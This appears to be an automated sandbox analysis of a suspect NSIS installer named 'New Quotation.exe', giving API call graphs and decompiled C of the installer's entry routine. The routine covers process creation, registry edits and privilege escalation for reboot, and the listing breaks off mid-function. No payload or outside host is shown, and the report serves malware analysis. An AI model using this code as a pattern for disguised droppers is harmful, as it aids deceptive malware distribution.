4822->4826 4827 404005 GetWindowLongW 4822->4827 4828 404046 4823->4828 4829 40402f DestroyWindow 4823->4829 4830 40140b 2 API calls 4824->4830 4835 404196 4825->4835 4893 404500 4826->4893 4827->4826 4837 40401e ShowWindow 4827->4837 4833 40404b SetWindowLongW 4828->4833 4834 40405c 4828->4834 4832 404422 4829->4832 4830->4820 4832->4831 4844 404453 ShowWindow 4832->4844 4833->4831 4834->4826 4838 404068 GetDlgItem 4834->4838 4835->4816 4839 40419a SendMessageW 4835->4839 4837->4823 4842 404096 4838->4842 4843 404079 SendMessageW IsWindowEnabled 4838->4843 4839->4831 4840 40140b 2 API calls 4840->4874 4841 404424 DestroyWindow EndDialog 4841->4832 4846 4040a3 4842->4846 4848 4040ea SendMessageW 4842->4848 4849 4040b6 4842->4849 4857 40409b 4842->4857 4843->4831 4843->4842 4844->4831 4845 40657a 17 API calls 4845->4874 4846->4848 4846->4857 4848->4826 4851 4040d3 4849->4851 4852 4040be 4849->4852 4850 4040d1 4850->4826 4854 40140b 2 API calls 4851->4854 4855 40140b 2 API calls 4852->4855 4853 404499 18 API calls 4853->4874 4856 4040da 4854->4856 4855->4857 4856->4826 4856->4857 4890 404472 4857->4890 4859 40424b GetDlgItem 4860 404260 4859->4860 4861 404268 ShowWindow KiUserCallbackDispatcher 4859->4861 4860->4861 4887 4044bb KiUserCallbackDispatcher 4861->4887 4863 404292 EnableWindow 4868 4042a6 4863->4868 4864 4042ab GetSystemMenu EnableMenuItem SendMessageW 4865 4042db SendMessageW 4864->4865 4864->4868 4865->4868 4867 403f7b 18 API calls 4867->4868 4868->4864 4868->4867 4888 4044ce SendMessageW 4868->4888 4889 40653d lstrcpynW 4868->4889 4870 40430a lstrlenW 4871 40657a 17 API calls 4870->4871 4872 404320 SetWindowTextW 4871->4872 4873 401389 2 API calls 4872->4873 4873->4874 4874->4831 4874->4840 4874->4841 4874->4845 4874->4853 4875 404364 DestroyWindow 4874->4875 4884 404499 4874->4884 4875->4832 4876 40437e CreateDialogParamW 4875->4876 4876->4832 4877 4043b1 4876->4877 4878 404499 18 API calls 4877->4878 4879 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4878->4879 4880 401389 2 API calls 4879->4880 4881 404402 4880->4881 4881->4831 4882 40440a ShowWindow 4881->4882 4883 4044e5 SendMessageW 4882->4883 4883->4832 4885 40657a 17 API calls 4884->4885 4886 4044a4 SetDlgItemTextW 4885->4886 4886->4859 4887->4863 4888->4868 4889->4870 4891 404479 4890->4891 4892 40447f SendMessageW 4890->4892 4891->4892 4892->4850 4894 4045c3 4893->4894 4895 404518 GetWindowLongW 4893->4895 4894->4831 4895->4894 4896 40452d 4895->4896 4896->4894 4897 40455a GetSysColor 4896->4897 4898 40455d 4896->4898 4897->4898 4899 404563 SetTextColor 4898->4899 4900 40456d SetBkMode 4898->4900 4899->4900 4901 404585 GetSysColor 4900->4901 4902 40458b 4900->4902 4901->4902 4903 404592 SetBkColor 4902->4903 4904 40459c 4902->4904 4903->4904 4904->4894 4905 4045b6 CreateBrushIndirect 4904->4905 4906 4045af DeleteObject 4904->4906 4905->4894 4906->4905 4921 401b9b 4922 401ba8 4921->4922 4923 401bec 4921->4923 4928 401c31 4922->4928 4929 401bbf 4922->4929 4924 401bf1 4923->4924 4925 401c16 GlobalAlloc 4923->4925 4934 40239d 4924->4934 4942 40653d lstrcpynW 4924->4942 4926 40657a 17 API calls 4925->4926 4926->4928 4927 40657a 17 API calls 4930 402397 4927->4930 4928->4927 4928->4934 4940 40653d lstrcpynW 4929->4940 4930->4934 4935 405b9d MessageBoxIndirectW 4930->4935 4933 401c03 GlobalFree 4933->4934 4935->4934 4936 401bce 4941 40653d lstrcpynW 4936->4941 4938 401bdd 4943 40653d lstrcpynW 4938->4943 4940->4936 4941->4938 4942->4933 4943->4934 5544 40261c 5545 402da6 17 API calls 5544->5545 5546 402623 5545->5546 5549 40602d GetFileAttributesW CreateFileW 5546->5549 5548 40262f 5549->5548 5550 40149e 5551 4014ac PostQuitMessage 5550->5551 5552 40239d 5550->5552 5551->5552 5553 40259e 5554 402de6 17 API calls 5553->5554 5555 4025a8 5554->5555 5556 402d84 17 API calls 5555->5556 5557 4025b1 5556->5557 5558 4025d9 RegEnumValueW 5557->5558 5559 4025cd RegEnumKeyW 5557->5559 5560 40292e 5557->5560 5561 4025ee RegCloseKey 5558->5561 5559->5561 5561->5560 5563 710923e9 5564 71092453 5563->5564 5565 7109245e GlobalAlloc 5564->5565 5566 7109247d 5564->5566 5565->5564 5567 4015a3 5568 402da6 17 API calls 5567->5568 5569 4015aa SetFileAttributesW 5568->5569 5570 4015bc 5569->5570 4156 401fa4 4157 402da6 17 API calls 4156->4157 4158 401faa 4157->4158 4159 40559f 24 API calls 4158->4159 4160 401fb4 4159->4160 4171 405b20 CreateProcessW 4160->4171 4163 401fdd CloseHandle 4167 40292e 4163->4167 4166 401fcf 4168 401fd4 4166->4168 4169 401fdf 4166->4169 4179 406484 wsprintfW 4168->4179 4169->4163 4172 405b53 CloseHandle 4171->4172 4173 401fba 4171->4173 4172->4173 4173->4163 4173->4167 4174 4069b5 WaitForSingleObject 4173->4174 4175 4069cf 4174->4175 4176 4069e1 GetExitCodeProcess 4175->4176 4180 406946 4175->4180 4176->4166 4179->4163 4181 406963 PeekMessageW 4180->4181 4182 406973 WaitForSingleObject 4181->4182 4183 406959 DispatchMessageW 4181->4183 4182->4175 4183->4181 5571 710910e1 5577 71091111 5571->5577 5572 710912b0 GlobalFree 5573 71091240 GlobalFree 5573->5577 5574 710911d7 GlobalAlloc 5574->5577 5575 710912ab 5575->5572 5576 7109135a 2 API calls 5576->5577 5577->5572 5577->5573 5577->5574 5577->5575 5577->5576 5578 71091312 2 API calls 5577->5578 5579 7109129a GlobalFree 5577->5579 5580 71091381 lstrcpyW 5577->5580 5581 7109116b GlobalAlloc 5577->5581 5578->5577 5579->5577 5580->5577 5581->5577 5582 40202a 5583 402da6 17 API calls 5582->5583 5584 402031 5583->5584 5585 40690a 5 API calls 5584->5585 5586 402040 5585->5586 5587 40205c GlobalAlloc 5586->5587 5590 4020cc 5586->5590 5588 402070 5587->5588 5587->5590 5589 40690a 5 API calls 5588->5589 5591 402077 5589->5591 5592 40690a 5 API calls 5591->5592 5593 402081 5592->5593 5593->5590 5597 406484 wsprintfW 5593->5597 5595 4020ba 5598 406484 wsprintfW 5595->5598 5597->5595 5598->5590 5599 40252a 5600 402de6 17 API calls 5599->5600 5601 402534 5600->5601 5602 402da6 17 API calls 5601->5602 5603 40253d 5602->5603 5604 402548 RegQueryValueExW 5603->5604 5605 40292e 5603->5605 5606 402568 5604->5606 5609 40256e RegCloseKey 5604->5609 5606->5609 5610 406484 wsprintfW 5606->5610 5609->5605 5610->5609 5611 4021aa 5612 402da6 17 API calls 5611->5612 5613 4021b1 5612->5613 5614 402da6 17 API calls 5613->5614 5615 4021bb 5614->5615 5616 402da6 17 API calls 5615->5616 5617 4021c5 5616->5617 5618 402da6 17 API calls 5617->5618 5619 4021cf 5618->5619 5620 402da6 17 API calls 5619->5620 5621 4021d9 5620->5621 5622 402218 CoCreateInstance 5621->5622 5623 402da6 17 API calls 5621->5623 5626 402237 5622->5626 5623->5622 5624 401423 24 API calls 5625 4022f6 5624->5625 5626->5624 5626->5625 5627 403baa 5628 403bb5 5627->5628 5629 403bb9 5628->5629 5630 403bbc GlobalAlloc 5628->5630 5630->5629 4260 40352d SetErrorMode GetVersionExW 4261 4035b7 4260->4261 4262 40357f GetVersionExW 4260->4262 4263 403610 4261->4263 4264 40690a 5 API calls 4261->4264 4262->4261 4265 40689a 3 API calls 4263->4265 4264->4263 4266 403626 lstrlenA 4265->4266 4266->4263 4267 403636 4266->4267 4268 40690a 5 API calls 4267->4268 4269 40363d 4268->4269 4270 40690a 5 API calls 4269->4270 4271 403644 4270->4271 4272 40690a 5 API calls 4271->4272 4273 403650 #17 OleInitialize SHGetFileInfoW 4272->4273 4351 40653d lstrcpynW 4273->4351 4276 40369d GetCommandLineW 4352 40653d lstrcpynW 4276->4352 4278 4036af 4279 405e39 CharNextW 4278->4279 4280 4036d5 CharNextW 4279->4280 4291 4036e6 4280->4291 4281 4037e4 4282 4037f8 GetTempPathW 4281->4282 4353 4034fc 4282->4353 4284 403810 4286 403814 GetWindowsDirectoryW lstrcatW 4284->4286 4287 40386a DeleteFileW 4284->4287 4285 405e39 CharNextW 4285->4291 4289 4034fc 12 API calls 4286->4289 4363 40307d GetTickCount GetModuleFileNameW 4287->4363 4292 403830 4289->4292 4290 40387d 4295 403941 4290->4295 4297 403932 4290->4297 4301 405e39 CharNextW 4290->4301 4291->4281 4291->4285 4294 4037e6 4291->4294 4292->4287 4293 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4292->4293 4296 4034fc 12 API calls 4293->4296 4447 40653d lstrcpynW 4294->4447 4452 403b12 4295->4452 4300 403862 4296->4300 4391 403bec 4297->4391 4300->4287 4300->4295 4318 40389f 4301->4318 4304 403a69 4459 405b9d 4304->4459 4305 403a7e 4307 403a86 GetCurrentProcess OpenProcessToken 4305->4307 4308 403afc ExitProcess 4305->4308 4312 403acc 4307->4312 4313 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4307->4313 4309 403908 4315 405f14 18 API calls 4309->4315 4310 403949 4317 405b08 5 API calls 4310->4317 4316 40690a 5 API calls 4312->4316 4313->4312 4319 403914 4315->4319 4320 403ad3 4316->4320 4321 40394e lstrcatW 4317->4321 4318->4309 4318->4310 4319->4295 4448 40653d lstrcpynW 4319->4448 4322 403ae8 ExitWindowsEx 4320->4322 4327 403af5 4320->4327 4323 40396a lstrcatW lstrcmpiW 4321->4323 4324 40395f lstrcatW 4321->4324 4322->4308 4322->4327 4323->4295 4325 40398a 4323->4325 4324->4323 4328 403996 4325->4328 4329 40398f 4325->4329 4463 40140b 4327->4463 4333 405aeb 2 API calls 4328->4333 4332 405a6e 4 API calls 4329->4332 4330 403927 4449 40653d lstrcpynW 4330->4449 4335 403994 4332->4335 4336 40399b SetCurrentDirectoryW 4333->4336 4335->4336 4337 4039b8 4336->4337 4338 4039ad 4336->4338 4451 40653d lstrcpynW 4337->4451 4450 40653d lstrcpynW 4338->4450 4341 40657a 17 API calls 4342 4039fa DeleteFileW 4341->4342 4343 403a06 CopyFileW 4342->4343 4348 4039c5 4342->4348 4343->4348 4344 403a50 4346 4062fd 36 API calls 4344->4346 4345 4062fd 36 API calls 4345->4348 4346->4295 4347 40657a 17 API calls 4347->4348 4348->4341 4348->4344 4348->4345 4348->4347 4349 405b20 2 API calls 4348->4349 4350 403a3a CloseHandle 4348->4350 4349->4348 4350->4348 4351->4276 4352->4278 4354 4067c4 5 API calls 4353->4354 4356 403508 4354->4356 4355 403512 4355->4284 4356->4355 4357 405e0c 3 API calls 4356->4357 4358 40351a 4357->4358 4359 405aeb 2 API calls 4358->4359 4360 403520 4359->4360 4466 40605c 4360->4466 4470 40602d GetFileAttributesW CreateFileW 4363->4470 4365 4030bd 4383 4030cd 4365->4383 4471 40653d lstrcpynW 4365->4471 4367 4030e3 4368 405e58 2 API calls 4367->4368 4369 4030e9 4368->4369 4472 40653d lstrcpynW 4369->4472 4371 4030f4 GetFileSize 4372 4031ee 4371->4372 4390 40310b 4371->4390 4473 403019 4372->4473 4374 4031f7 4376 403227 GlobalAlloc 4374->4376 4374->4383 4485 4034e5 SetFilePointer 4374->4485 4375 4034cf ReadFile 4375->4390 4484 4034e5 SetFilePointer 4376->4484 4378 40325a 4380 403019 6 API calls 4378->4380 4380->4383 4381 403210 4384 4034cf ReadFile 4381->4384 4382 403242 4385 4032b4 31 API calls 4382->4385 4383->4290 4386 40321b 4384->4386 4388 40324e 4385->4388 4386->4376 4386->4383 4387 403019 6 API calls 4387->4390 4388->4383 4388->4388 4389 40328b SetFilePointer 4388->4389 4389->4383 4390->4372 4390->4375 4390->4378 4390->4383 4390->4387 4392 40690a 5 API calls 4391->4392 4393 403c00 4392->4393 4394 403c06 4393->4394 4395 403c18 4393->4395 4501 406484 wsprintfW 4394->4501 4396 40640b 3 API calls 4395->4396 4397 403c48 4396->4397 4399 403c67 lstrcatW 4397->4399 4401 40640b 3 API calls 4397->4401 4400 403c16 4399->4400 4486 403ec2 4400->4486 4401->4399 4404 405f14 18 API calls 4405 403c99 4404->4405 4406 403d2d 4405->4406 4408 40640b 3 API calls 4405->4408 4407 405f14 18 API calls 4406->4407 4409 403d33 4407->4409 4410 403ccb 4408->4410 4411 403d43 LoadImageW 4409->4411 4412 40657a 17 API calls 4409->4412 4410->4406 4415 403cec lstrlenW 4410->4415 4419 405e39 CharNextW 4410->4419 4413 403de9 4411->4413 4414 403d6a RegisterClassW 4411->4414 4412->4411 4418 40140b 2 API calls 4413->4418 4416 403da0 SystemParametersInfoW CreateWindowExW 4414->4416 4417 403df3 4414->4417 4420 403d20 4415->4420 4421 403cfa lstrcmpiW 4415->4421 4416->4413 4417->4295 4422 403def 4418->4422 4423 403ce9 4419->4423 4425 405e0c 3 API calls 4420->4425 4421->4420 4424 403d0a GetFileAttributesW 4421->4424 4422->4417 4427 403ec2 18 API calls 4422->4427 4423->4415 4426 403d16 4424->4426 4428 403d26 4425->4428 4426->4420 4429 405e58 2 API calls 4426->4429 4430 403e00 4427->4430 4502 40653d lstrcpynW 4428->4502 4429->4420 4432 403e0c ShowWindow 4430->4432 4433 403e8f 4430->4433 4434 40689a 3 API calls 4432->4434 4494 405672 OleInitialize 4433->4494 4436 403e24 4434->4436 4438 403e32 GetClassInfoW 4436->4438 4441 40689a 3 API calls 4436->4441 4437 403e95 4439 403eb1 4437->4439 4440 403e99 4437->4440 4443 403e46 GetClassInfoW RegisterClassW 4438->4443 4444 403e5c DialogBoxParamW 4438->4444 4442 40140b 2 API calls 4439->4442 4440->4417 4445 40140b 2 API calls 4440->4445 4441->4438 4442->4417 4443->4444 4446 40140b 2 API calls 4444->4446 4445->4417 4446->4417 4447->4282 4448->4330 4449->4297 4450->4337 4451->4348 4453 403b2a 4452->4453 4454 403b1c CloseHandle 4452->4454 4514 403b57 4453->4514 4454->4453 4457 405c49 67 API calls 4458 403a5e OleUninitialize 4457->4458 4458->4304 4458->4305 4460 405bb2 4459->4460 4461 403a76 ExitProcess 4460->4461 4462 405bc6 MessageBoxIndirectW 4460->4462 4462->4461 4464 401389 2 API calls 4463->4464 4465 401420 4464->4465 4465->4308 4467 406069 GetTickCount GetTempFileNameW 4466->4467 4468 40352b 4467->4468 4469 40609f 4467->4469 4468->4284 4469->4467 4469->4468 4470->4365 4471->4367 4472->4371 4474 403022 4473->4474 4475 40303a 4473->4475 4476 403032 4474->4476 4477 40302b DestroyWindow 4474->4477 4478 403042 4475->4478 4479 40304a GetTickCount 4475->4479 4476->4374 4477->4476 4480 406946 2 API calls 4478->4480 4481 403058 CreateDialogParamW ShowWindow 4479->4481 4482 40307b 4479->4482 4483 403048 4480->4483 4481->4482 4482->4374 4483->4374 4484->4382 4485->4381 4487 403ed6 4486->4487 4503 406484 wsprintfW 4487->4503 4489 403f47 4504 403f7b 4489->4504 4491 403c77 4491->4404 4492 403f4c 4492->4491 4493 40657a 17 API calls 4492->4493 4493->4492 4507 4044e5 4494->4507 4496 405695 4500 4056bc 4496->4500 4510 401389 4496->4510 4497 4044e5 SendMessageW 4498 4056ce OleUninitialize 4497->4498 4498->4437 4500->4497 4501->4400 4502->4406 4503->4489 4505 40657a 17 API calls 4504->4505 4506 403f89 SetWindowTextW 4505->4506 4506->4492 4508 4044fd 4507->4508 4509 4044ee SendMessageW 4507->4509 4508->4496 4509->4508 4511 401390 4510->4511 4512 4013fe 4511->4512 4513 4013cb MulDiv SendMessageW 4511->4513 4512->4496 4513->4511 4515 403b65 4514->4515 4516 403b2f 4515->4516 4517 403b6a FreeLibrary GlobalFree 4515->4517 4516->4457 4517->4516 4517->4517 5631 401a30 5632 402da6 17 API calls 5631->5632 5633 401a39 ExpandEnvironmentStringsW 5632->5633 5634 401a4d 5633->5634 5636 401a60 5633->5636 5635 401a52 lstrcmpW 5634->5635 5634->5636 5635->5636 5637 71091979 5639 7109199c 5637->5639 5638 710919e3 5641 71091312 2 API calls 5638->5641 5639->5638 5640 710919d1 GlobalFree 5639->5640 5640->5638 5642 71091b6e GlobalFree GlobalFree 5641->5642 5648 4023b2 5649 4023ba 5648->5649 5652 4023c0 5648->5652 5650 402da6 17 API calls 5649->5650 5650->5652 5651 4023ce 5654 4023dc 5651->5654 5655 402da6 17 API calls 5651->5655 5652->5651 5653 402da6 17 API calls 5652->5653 5653->5651 5656 402da6 17 API calls 5654->5656 5655->5654 5657 4023e5 WritePrivateProfileStringW 5656->5657 4573 402434 4574 402467 4573->4574 4575 40243c 4573->4575 4577 402da6 17 API calls 4574->4577 4585 402de6 4575->4585 4578 40246e 4577->4578 4590 402e64 4578->4590 4581 40244d 4583 402da6 17 API calls 4581->4583 4582 40247b 4584 402454 RegDeleteValueW RegCloseKey 4583->4584 4584->4582 4586 402da6 17 API calls 4585->4586 4587 402dfd 4586->4587 4588 4063aa RegOpenKeyExW 4587->4588 4589 402443 4588->4589 4589->4581 4589->4582 4591 402e71 4590->4591 4592 402e78 4590->4592 4591->4582 4592->4591 4594 402ea9 4592->4594 4595 4063aa RegOpenKeyExW 4594->4595 4596 402ed7 4595->4596 4597 402ee1 4596->4597 4598 402f8c 4596->4598 4599 402ee7 RegEnumValueW 4597->4599 4600 402f0a 4597->4600 4598->4591 4599->4600 4601 402f71 RegCloseKey 4599->4601 4600->4601 4602 402f46 RegEnumKeyW 4600->4602 4603 402f4f RegCloseKey 4600->4603 4606 402ea9 6 API calls 4600->4606 4601->4598 4602->4600 4602->4603 4604 40690a 5 API calls 4603->4604 4605 402f5f 4604->4605 4607 402f81 4605->4607 4608 402f63 RegDeleteKeyW 4605->4608 4606->4600 4607->4598 4608->4598 5658 401735 5659 402da6 17 API calls 5658->5659 5660 40173c SearchPathW 5659->5660 5661 401757 5660->5661 4609 71092a7f 4610 71092acf 4609->4610 4611 71092a8f VirtualProtect 4609->4611 4611->4610 5662 4014b8 5663 4014be 5662->5663 5664 401389 2 API calls 5663->5664 5665 4014c6 5664->5665 5666 401d38 5667 402d84 17 API calls 5666->5667 5668 401d3f 5667->5668 5669 402d84 17 API calls 5668->5669 5670 401d4b GetDlgItem 5669->5670 5671 402638 5670->5671 5672 71091774 5673 710917a3 5672->5673 5674 71091bff 22 API calls 5673->5674 5675 710917aa 5674->5675 5676 710917bd 5675->5676 5677 710917b1 5675->5677 5679 710917e4 5676->5679 5680 710917c7 5676->5680 5678 71091312 2 API calls 5677->5678 5683 710917bb 5678->5683 5681 710917ea 5679->5681 5682 7109180e 5679->5682 5684 710915dd 3 API calls 5680->5684 5685 71091654 3 API calls 5681->5685 5686 710915dd 3 API calls 5682->5686 5687 710917cc 5684->5687 5688 710917ef 5685->5688 5686->5683 5689 71091654 3 API calls 5687->5689 5691 71091312 2 API calls 5688->5691 5690 710917d2 5689->5690 5692 71091312 2 API calls 5690->5692 5693 710917f5 GlobalFree 5691->5693 5694 710917d8 GlobalFree 5692->5694 5693->5683 5695 71091809 GlobalFree 5693->5695 5694->5683 5695->5683 5696 40263e 5697 402652 5696->5697 5698 40266d 5696->5698 5699 402d84 17 API calls 5697->5699 5700 402672 5698->5700 5701 40269d 5698->5701 5709 402659 5699->5709 5702 402da6 17 API calls 5700->5702 5703 402da6 17 API calls 5701->5703 5704 402679 5702->5704 5705 4026a4 lstrlenW 5703->5705 5713 40655f WideCharToMultiByte 5704->5713 5705->5709 5707 40268d lstrlenA 5707->5709 5708 4026e7 5709->5708 5711 40610e 5 API calls 5709->5711 5712 4026d1 5709->5712 5710 4060df WriteFile 5710->5708 5711->5712 5712->5708 5712->5710 5713->5707

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0040352D Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450stringfilecomCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 38 403702-403706 35->38 39 4036fd-403701 35->39 36->35 36->36 47 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->47 48 40386a-403882 DeleteFileW call 40307d 37->48 41 4037c6-4037d4 call 405e39 38->41 42 40370c-403712 38->42 39->38 41->32 58 4037d6-4037d7 41->58 45 403714-40371b 42->45 46 40372c-403765 42->46 51 403722 45->51 52 40371d-403720 45->52 53 403781-4037bb 46->53 54 403767-40376c 46->54 47->48 62 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 47->62 64 403888-40388e 48->64 65 403a59-403a67 call 403b12 OleUninitialize 48->65 51->46 52->46 52->51 56 4037c3-4037c5 53->56 57 4037bd-4037c1 53->57 54->53 60 40376e-403776 54->60 56->41 57->56 63 4037e6-4037f3 call 40653d 57->63 58->32 66 403778-40377b 60->66 67 40377d 60->67 62->48 62->65 63->37 69 403894-4038a7 call 405e39 64->69 70 403935-40393c call 403bec 64->70 79 403a69-403a78 call 405b9d ExitProcess 65->79 80 403a7e-403a84 65->80 66->53 66->67 67->53 84 4038f9-403906 69->84 85 4038a9-4038de 69->85 78 403941-403944 70->78 78->65 82 403a86-403a9b GetCurrentProcess OpenProcessToken 80->82 83 403afc-403b04 80->83 89 403acc-403ada call 40690a 82->89 90 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 82->90 92 403b06 83->92 93 403b09-403b0c ExitProcess 83->93 86 403908-403916 call 405f14 84->86 87 403949-40395d call 405b08 lstrcatW 84->87 91 4038e0-4038e4 85->91 86->65 103 40391c-403932 call 40653d * 2 86->103 106 40396a-403984 lstrcatW lstrcmpiW 87->106 107 40395f-403965 lstrcatW 87->107 104 403ae8-403af3 ExitWindowsEx 89->104 105 403adc-403ae6 89->105 90->89 97 4038e6-4038eb 91->97 98 4038ed-4038f5 91->98 92->93 97->98 102 4038f7 97->102 98->91 98->102 102->84 103->70 104->83 111 403af5-403af7 call 40140b 104->111 105->104 105->111 108 403a57 106->108 109 40398a-40398d 106->109 107->106 108->65 112 403996 call 405aeb 109->112 113 40398f-403994 call 405a6e 109->113 111->83 121 40399b-4039ab SetCurrentDirectoryW 112->121 113->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 134 403a50-403a52 call 4062fd 131->134 132->131 133 403a18-403a38 call 4062fd call 40657a call 405b20 132->133 133->131 142 403a3a-403a41 CloseHandle 133->142 134->108 142->131
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\New Quotation.exe\" ";
				E0040653D(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\New Quotation.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00440002;
				}
				_t199 = CharNextW(E00405E39(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"3073"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
